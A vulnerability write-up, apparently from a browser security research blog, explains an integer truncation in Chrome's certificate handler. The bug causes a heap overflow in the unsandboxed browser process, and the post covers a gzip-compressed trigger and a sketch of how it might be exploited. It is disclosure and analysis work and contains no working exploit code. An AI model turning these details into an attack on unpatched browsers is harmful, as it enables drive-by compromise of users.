Posted by Mark Brand, Truncator of Integers
This is going to be a quick post, just describing a particularly interesting Chrome issue that I found last month; how I found it; and what is interesting about it…
I was looking through some Chrome networking code; and I noticed an interesting API design choice that piqued my interest; the IOBuffer interface. These are used throughout the networking stack to manage buffer lifetimes; and there are few things that are interesting about them:
class NET_EXPORT IOBuffer : public base::RefCountedThreadSafe<IOBuffer> {
public:
IOBuffer();
explicit IOBuffer(int buffer_size);
char* data() { return data_; }
protected:
friend class base::RefCountedThreadSafe<IOBuffer>;
// Only allow derived classes to specify data_.
// In all other cases, we own data_, and must delete it at destruction time.
explicit IOBuffer(char* data);
virtual ~IOBuffer();
char* data_;
};
public:
IOBuffer();
explicit IOBuffer(int buffer_size);
char* data() { return data_; }
protected:
friend class base::RefCountedThreadSafe<IOBuffer>;
// Only allow derived classes to specify data_.
// In all other cases, we own data_, and must delete it at destruction time.
explicit IOBuffer(char* data);
virtual ~IOBuffer();
char* data_;
};
So, there are several questions that I immediately want to ask about the design of this interface; but we’ll stay on track for the question that will lead us to the bug. Why does the constructor takes an int for the buffer_size parameter?
Why is this interesting? There are perhaps too many integer types in C/C++; and the misuse of them is a common cause of vulnerabilities. The language has a specific type for representing the sizes of objects; this is size_t, and it’s perhaps relevant to quote the C standard here:
‘The types used for size_t and ptrdiff_t should not have an integer conversion rank greater than that of signed long int unless the implementation supports objects large enough to make this necessary’
I assume that this recommendation was made precisely to prevent this kind of issue from occurring; having int and size_t be compatible types would make things safer for programmers that have been taught that int is always the correct numerical type to use. For completeness sake; I’ll note that the other issue would be one of signedness; size_t is required to be an unsigned type; and this means that the range of size_t and int is not the same, even on systems where they have the same bit-width; however, the case of integer overflow resulting in a negative length is handled correctly in the IOBuffer constructor.
Now; on x86_64, with gcc and clang an int is still a 32-bit integer type; but as we can have allocations over the 2^32 limit, size_t is necessarily a 64-bit integer type, and so in any location where we use a size_t type to initialise an IOBuffer instance, we risk truncating the size and allocating a smaller buffer than we expect. It turns out that in content::CertificateResourceHandler, which handles the mime-type ‘application/x-x509-user-cert’, that is exactly what’s going to happen. This is quite a simple class, which simply stores chunks of a certificate in an internal list as they are received, totals the length and then reassembles those chunks.
bool CertificateResourceHandler::OnReadCompleted(int bytes_read, bool* defer) {
if (!bytes_read)
return true;
// We have more data to read.
DCHECK(read_buffer_.get());
content_length_ += bytes_read;
if (!bytes_read)
return true;
// We have more data to read.
DCHECK(read_buffer_.get());
content_length_ += bytes_read;
// Release the ownership of the buffer, and store a reference
// to it. A new one will be allocated in OnWillRead().
scoped_refptr<net::IOBuffer> buffer;
read_buffer_.swap(buffer);
// TODO(gauravsh): Should this be handled by a separate thread?
buffer_.push_back(std::make_pair(buffer, bytes_read));
return true;
}
// to it. A new one will be allocated in OnWillRead().
scoped_refptr<net::IOBuffer> buffer;
read_buffer_.swap(buffer);
// TODO(gauravsh): Should this be handled by a separate thread?
buffer_.push_back(std::make_pair(buffer, bytes_read));
return true;
}
We’re summing the length in a member variable, content_length_ (which is of type ‘size_t’), and then we later encounter the discussed integer truncation issue when we come to put the pieces back together.
void CertificateResourceHandler::AssembleResource() {
// 0-length IOBuffers are not allowed.
if (content_length_ == 0) {
resource_buffer_ = NULL;
return;
}
// Create the new buffer.
resource_buffer_ = new net::IOBuffer(content_length_); // allocation truncated
// Copy the data into it.
size_t bytes_copied = 0;
for (size_t i = 0; i < buffer_.size(); ++i) {
net::IOBuffer* data = buffer_[i].first.get();
size_t data_len = buffer_[i].second;
DCHECK(data != NULL);
DCHECK_LE(bytes_copied + data_len, content_length_);
memcpy(resource_buffer_->data() + bytes_copied, data->data(), data_len); // heap corruption will occur here
bytes_copied += data_len;
}
DCHECK_EQ(content_length_, bytes_copied);
}
// 0-length IOBuffers are not allowed.
if (content_length_ == 0) {
resource_buffer_ = NULL;
return;
}
// Create the new buffer.
resource_buffer_ = new net::IOBuffer(content_length_); // allocation truncated
// Copy the data into it.
size_t bytes_copied = 0;
for (size_t i = 0; i < buffer_.size(); ++i) {
net::IOBuffer* data = buffer_[i].first.get();
size_t data_len = buffer_[i].second;
DCHECK(data != NULL);
DCHECK_LE(bytes_copied + data_len, content_length_);
memcpy(resource_buffer_->data() + bytes_copied, data->data(), data_len); // heap corruption will occur here
bytes_copied += data_len;
}
DCHECK_EQ(content_length_, bytes_copied);
}
So, we can serve up a certificate with a ridiculously long length, for example 0x100001000 bytes, and once this has all made it down the HTTP pipe to Chrome, we’ll try to copy those many, many bytes into a buffer of (int)0x100001000 bytes.
Truncation will happen like this:
size_t 00000001 00001000
int 00001000
And it’s pretty easy to see that bad things are now going to happen. See the tracker for a crash PoC.
Now, the more astute reader will point out that I just sent over 4 gigabytes of data over the internet; and that this can’t really be all that interesting - but that argument is readily countered with gzip encoding, reducing the required data to a 4 megabyte payload. Of course, you do need to wait a little while for Chrome to perform the gzip deflation; something like 30 seconds for me; but this is not a major issue as this is taking place in a background thread in the browser process, and will not really be noticeable, except for high processor usage.
And that leads us to probably the most interesting thing about this bug. This is taking place in the browser process; for those not familiar with the Chrome sandbox model; http://blog.azimuthsecurity.com/2010/05/chrome-sandbox-part-1-of-3-overview.html is a nice introduction. The browser process is the trusted, unsandboxed process; making this bug a single-bug full compromise issue, potentially resulting in unsandboxed arbitrary code execution from a drive-by with a single bug.
This is a little bit scary; considering that typical pwnium entries consist of quite lengthy and convoluted bug chains. It just serves to highlight the importance of minimizing the unsandboxed attack surface.
It’s going to be a difficult issue to exploit; even on a 64-bit system, surviving a 4-gigabyte out-of-bounds memcpy is a nontrivial problem. To make things worse, the browser process is interacted with frequently by all the live renderer processes; so achieving determinism from the heap is going to be a serious challenge; but as in this Safari exploit; if stable exploitation is possible, the first step is likely going to be to manage to arrange for the heap corruption caused by the overflow to corrupt the buffer_ vector, so that we can control the size of the overflow.
0 Comments:
Post a Comment